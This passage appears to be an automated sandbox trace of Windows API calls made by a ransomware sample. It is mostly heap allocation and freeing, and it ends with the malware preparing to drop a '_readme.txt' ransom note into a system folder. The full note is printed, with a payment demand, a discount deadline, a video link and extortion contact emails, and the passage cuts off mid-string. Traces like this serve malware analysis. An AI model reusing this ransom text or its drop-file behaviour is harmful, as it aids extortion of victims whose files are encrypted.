hHeap=0x6a0000) returned 1 [0175.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.235] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.270] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0175.270] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.270] PathFindFileNameW (pszPath="") returned="" [0175.270] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.271] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.271] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.271] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.272] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0175.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.272] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0175.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.273] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.273] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you 